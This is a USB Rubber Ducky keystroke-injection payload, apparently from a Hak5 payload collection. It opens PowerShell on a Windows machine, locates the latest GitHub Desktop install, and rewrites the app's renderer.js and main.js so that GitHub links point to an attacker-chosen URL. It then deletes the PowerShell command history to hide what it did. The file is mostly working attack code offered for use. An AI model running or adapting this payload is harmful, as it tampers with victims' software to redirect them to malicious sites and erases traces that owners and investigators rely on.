1
REM_BLOCK
2
#####################################################
3
#                                                   #
4
# Title        : Replace Links In GithubDesktop     #
5
# Author       : Aleff                              #
6
# Version      : 1.0                                #
7
# Category     : Execution                          #
8
# Target       : Windows 10/11                      #
9
#                                                   #
10
#####################################################
11
END_REM
12

13

14
REM REQUIRED - Define here the new url that will replace the original github link
15
DEFINE #NEW_LINK example.com
16

17
REM DON'T CHANGE - This variable is a constant in this case, change it only if you are sure that the path to GithubDesktop is not the default
18
DEFINE #SUBDIRECTORY \AppData\Local\GitHubDesktop
19

20

21
REM_BLOCK
22
    Credits:    Hak5 LLC
23
    Website:    https://hak5.org/
24
    Source:     https://github.com/hak5/usbrubberducky-payloads/blob/master/payloads/extensions/passive_windows_detect.txt
25
END_REM
26

27
EXTENSION PASSIVE_WINDOWS_DETECT
28
    REM VERSION 1.1
29
    REM AUTHOR: Korben
30

31
    REM_BLOCK DOCUMENTATION
32
        Windows fully passive OS Detection and passive Detect Ready
33
        Includes its own passive detect ready.
34
        Does not require additional extensions.
35

36
        USAGE:
37
            Extension runs inline (here)
38
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
39
            boot delay
40
            $_OS will be set to WINDOWS or NOT_WINDOWS
41
            See end of payload for usage within payload
42
    END_REM
43

44
    REM CONFIGURATION:
45
    DEFINE #MAX_WAIT 150
46
    DEFINE #CHECK_INTERVAL 20
47
    DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
48
    DEFINE #NOT_WINDOWS 7
49

50
    $_OS = #NOT_WINDOWS
51

52
    VAR $MAX_TRIES = #MAX_WAIT
53
    WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
54
        DELAY #CHECK_INTERVAL
55
        $MAX_TRIES = ($MAX_TRIES - 1)
56
    END_WHILE
57
    IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
58
        $_OS = WINDOWS
59
    END_IF
60

61
    REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
62
        IF ($_OS == WINDOWS) THEN
63
            STRING HELLO WINDOWS!
64
        ELSE
65
            STRING HELLO WORLD!
66
        END_IF
67
    END_REM
68
END_EXTENSION
69

70

71
GUI r
72
DELAY 1000
73
STRINGLN PowerShell
74
DELAY 1000
75

76
STRINGLN_POWERSHELL
77
    $path = Join-Path -Path $env:USERPROFILE -ChildPath "#SUBDIRECTORY"
78

79
    $folders = Get-ChildItem -Path $path -Directory | Where-Object { $_.Name -like "app-*" }
80

81
    $versions = $folders | ForEach-Object {
82
        [PSCustomObject]@{
83
            FolderName = $_.Name
84
            Version = [version]($_.Name -replace "app-", "")
85
        }
86
    }
87

88
    $latestVersionFolder = $versions | Sort-Object Version -Descending | Select-Object -First 1
89

90
    $latestFolderPath = Join-Path -Path $path -ChildPath $latestVersionFolder.FolderName
91
    $latestFolderPath += "\resources\app\"
92
    $renderer = "renderer.js"
93
    $main = "main.js"
94

95
    $filePath = "$latestFolderPath$renderer"
96

97
    $fileContent = Get-Content $filePath
98
    $regex = [regex]'(https:\/\/(?![\w\d\.\/\-]*api)[\w\d\.\/\-]*github[\w\d\.\/\-]+)'
99
    $modifiedContent = $fileContent -replace $regex, '#NEW_LINK'
100
    Set-Content -Path $filePath -Value $modifiedContent
101

102

103
    $filePath = "$latestFolderPath$main"
104
    $fileContent = Get-Content $filePath
105
    $regex = [regex]'openExternal\("(https:\/\/[\w\d\.\/\-]*github[\w\d\.\/\-]+)"\)'
106
    $modifiedContent = $fileContent -replace $regex, ('openExternal("#NEW_LINK")')
107
    Set-Content -Path $filePath -Value $modifiedContent; Remove-Item (Get-PSReadlineOption).HistorySavePath; exit
108

109
END_STRINGLN
110

111